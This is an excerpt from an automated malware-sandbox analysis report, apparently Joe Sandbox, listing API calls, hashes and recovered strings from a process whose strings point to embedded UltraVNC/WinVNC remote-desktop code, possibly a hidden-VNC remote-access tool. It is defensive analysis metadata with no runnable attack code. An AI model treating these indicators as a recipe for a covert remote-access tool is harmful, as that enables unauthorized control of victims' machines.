                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$StringTypefreemalloc
                                                      • String ID:
                                                      • API String ID: 307345228-0
                                                      • Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                      • Instruction ID: b12a929c49b8f9290ba8c38edbb1492aa5a3dc3cfa24597954fae53d72a688b0
                                                      • Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                      • Instruction Fuzzy Hash: 12417F72A256818AEB20AF3598111E9A2E5FF45BA8F984231EF2D477D5DF3CF5018321
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CE7AB1
                                                      • DecodePointer.KERNEL32(?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CE7AC1
                                                        • Part of subcall function 00007FF790CF3480: _errno.LIBCMT ref: 00007FF790CF3489
                                                        • Part of subcall function 00007FF790CF3480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF3494
                                                      • EncodePointer.KERNEL32(?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CE7B3F
                                                        • Part of subcall function 00007FF790CF3370: realloc.LIBCMT ref: 00007FF790CF339B
                                                        • Part of subcall function 00007FF790CF3370: Sleep.KERNEL32(?,?,00000000,00007FF790CE7B2F,?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CF33B7
                                                      • EncodePointer.KERNEL32(?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CE7B4F
                                                      • EncodePointer.KERNEL32(?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CE7B5C
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                      • String ID:
                                                      • API String ID: 1909145217-0
                                                      • Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                      • Instruction ID: 8b23c6e2057f75f879b6971865b22dfe64f89d17dccf6ba53fda1ce489fd1fe3
                                                      • Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                      • Instruction Fuzzy Hash: 2B21E521B2974252EA21BB32F95D0B9E3A1BF49BC0F841835CA0E47755EE7CF885C324
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalDeleteSection$FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3328731263-0
                                                      • Opcode ID: 8efbe1f9ef3851a4ff4b1dc12ed94241d7363f7543c6192012ec118bd10c3970
                                                      • Instruction ID: df9dcb77a53add96d48bbea43b624cf14d5d124420c9620ce74714f802cfc782
                                                      • Opcode Fuzzy Hash: 8efbe1f9ef3851a4ff4b1dc12ed94241d7363f7543c6192012ec118bd10c3970
                                                      • Instruction Fuzzy Hash: DE214425739A81A6DA68FB34D5A42F8E360FF82754F841131C6AD033A1DF2CF5A5C321
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterSectionclosesocketshutdown
                                                      • String ID: c$vncclient.cpp : enable update thread$vncclient.cpp : enable/disable synced$vncclient.cpp : protocol enabled too many times!
                                                      • API String ID: 3339156387-1190838069
                                                      • Opcode ID: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
                                                      • Instruction ID: 4a9a8fdfdca536011bdf5dc15a3d15475b6c2d806cb5e76850be51c3b3583717
                                                      • Opcode Fuzzy Hash: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
                                                      • Instruction Fuzzy Hash: EE212C61A38A8281EB60EF35D9402F9A3A4FF85BA4F841231D95D873E5DF3CE445C760
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Event$CriticalInitializeSection
                                                      • String ID:
                                                      • API String ID: 4164307405-0
                                                      • Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                      • Instruction ID: 057d5741a0a53eb0d737dcc1813d4922ed813e1c8cee614bdeb66e44348d8465
                                                      • Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                      • Instruction Fuzzy Hash: E701E572524B41C2D714DF35E9840A8B3F8FB98F98B645136CA8D47768CF38D5A5C350
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __doserrno_errno
                                                      • String ID:
                                                      • API String ID: 921712934-0
                                                      • Opcode ID: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                      • Instruction ID: ff2fa3454342f65c21eef2ef06f81ce719d1cdb140c0357450f6f5fb0ecf463e
                                                      • Opcode Fuzzy Hash: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                      • Instruction Fuzzy Hash: E801AD62E29A4245FA253BB485513FCE1929F93B72FD25331D92D067D2CE6CF901A630
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: gethostbynamesprintf
                                                      • String ID: %d.$IP address unavailable
                                                      • API String ID: 4032199589-2983120142
                                                      • Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                      • Instruction ID: a37a295044eb315cc3e83d327e8501143cac8871a167bfdcf507cfe62ea50c47
                                                      • Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                      • Instruction Fuzzy Hash: 2341C225628A8181D630EB35B8401AAF7A0FB45BF4F845331EEAE43BE5DF3CE4819710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DesktopInputOpen
                                                      • String ID: Default
                                                      • API String ID: 601053899-753088835
                                                      • Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                      • Instruction ID: 5adaa5a4058e76ea5c0c92f7cfe5b3e435bf49f58b1abde77b812da3d7c92ef7
                                                      • Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                      • Instruction Fuzzy Hash: 7C216A35A2868282EA71EB31B4553EAB3A1FF8A744FC41031DA9D47B99DF2CE514CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID: fake %d down$fake %d up
                                                      • API String ID: 4278518827-2496597273
                                                      • Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                      • Instruction ID: d3e5bba2e2d452f55e96e7c1afebbba74ecff45a5320e4f87aef56c1e48cf8f0
                                                      • Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                      • Instruction Fuzzy Hash: CA01C422F2868182E774A736A4501B9FBA2AF89744FA89435D94D033A5CE3CF446CB60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
                                                      • String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
                                                      • API String ID: 542764273-2415377678
                                                      • Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                      • Instruction ID: 2dbecd1f2dc6b717ca81889c199e66582465952ca811133d5aec8bfadc2f0991
                                                      • Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                      • Instruction Fuzzy Hash: 1D01F7B5A3854396EA60BB30E8006F5B761BF95309FC06036D80D127A1DE3CF61ACBB1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessWindow$CurrentFindThread
                                                      • String ID: WinVNC Tray Icon
                                                      • API String ID: 1332243453-1071638575
                                                      • Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                      • Instruction ID: a428aa686151729d7a7d81b931066bcecb39091ceffa666c7211c877be084742
                                                      • Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                      • Instruction Fuzzy Hash: 27F03621A2C74182EBA49B75B441469E2B1FF88B84FC42035EA5E46755EF3CE585CB10
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF790CEABE5,?,?,00000028,00007FF790CE8C7D,?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749), ref: 00007FF790CEABAB
                                                      • GetProcAddress.KERNEL32(?,?,000000FF,00007FF790CEABE5,?,?,00000028,00007FF790CE8C7D,?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749), ref: 00007FF790CEABC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 1646373207-1276376045
                                                      • Opcode ID: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
                                                      • Instruction ID: 07908d4a80fafc6cd67fda66865c880020baab439d4e3ccd326b7ce5c3d98930
                                                      • Opcode Fuzzy Hash: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
                                                      • Instruction Fuzzy Hash: 88E0EC20B3670252FE29BB71A88457893B1AF59700BCC6478C41E06390EE6CF9998260
                                                      APIs
                                                      • malloc.LIBCMT ref: 00007FF790C52328
                                                        • Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
                                                        • Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
                                                        • Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
                                                        • Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
                                                        • Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8
                                                      • free.LIBCMT ref: 00007FF790C52564
                                                      • free.LIBCMT ref: 00007FF790C52617
                                                        • Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
                                                        • Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
                                                        • Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C
                                                      Strings
                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF790C5230B
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                      • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
                                                      • API String ID: 1063416079-2438250478
                                                      • Opcode ID: c273d361c54b140607c5df8769fb8004b8d8c010dfb8c9ff937b48554944af27
                                                      • Instruction ID: 5c0726f80def7a8d3993b49a70d15f95181e258d5521927a8b2409f7769856e1
                                                      • Opcode Fuzzy Hash: c273d361c54b140607c5df8769fb8004b8d8c010dfb8c9ff937b48554944af27
                                                      • Instruction Fuzzy Hash: 0FA17E2A718A9184EB60EB36D4542ED63A0FF86FA8F944232DE2E577E5DF38D445C310
                                                      APIs
                                                      Strings
                                                      • i, xrefs: 00007FF790C5A754
